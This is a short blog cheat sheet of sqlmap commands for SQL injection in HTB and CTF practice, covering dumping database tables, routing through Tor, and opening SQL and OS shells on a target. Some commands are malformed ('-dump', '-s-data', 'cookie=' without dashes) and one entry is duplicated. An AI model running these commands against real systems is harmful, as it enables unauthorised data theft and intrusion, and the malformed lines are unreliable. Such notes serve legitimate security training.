sqlmap Cheatsheet

Quick writeup and cheat sheet for sqlmap the automated SQLi and database takeover tool to speed up HTB/CTFs

Simple usage

sqlmap -u "$URL"

Specify target DBMS to MySQL

sqlmap -u "$URL" --dbms=mysql

Using a proxy

sqlmap -u "$URL" --proxy=http://proxy_address:port

Specify param1 to exploit

sqlmap -u "$URLparam1=value1&param2=value2" -p param1

Use POST requests

sqlmap -u "http://target_server" --data=param1=value1&param2=value2

Access with authenticated session

sqlmap -u "http://target_server" --data=param1=value1&param2=value2 -p param1 cookie='my_cookie_value'

Basic authentication

sqlmap -u "http://target_server" -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password

Specify parameter to exploit

sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

Specify parameter to exploit in ‘nice’ URIs

sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

Evaluating response strings

sqlmap -u "$URL" --string="This string if query is TRUE"
sqlmap -u "$URL" --not-string="This string if query is FALSE"

List databases

sqlmap -u "$URL" --dbs

List databases

sqlmap -u "$URL" --dbs

List tables of database target_DB

sqlmap -u "$URL" -D target_DB --tables

Dump table target_Table of database target_DB

sqlmap -u "$URL" -D target_DB -T target_Table -dump

List columns of table target_Table of database target_DB

sqlmap -u "$URL" -D target_DB -T target_Table --columns

Scan through TOR

sqlmap -u "$URL" --tor --tor-type=SOCKS5

Get SQL Shell

sqlmap -u "$URL" --sql-shell

Get OS Shell

sqlmap -u "$URL" --os-shell
Written on August 25, 2022


◀ Back to the Pensieve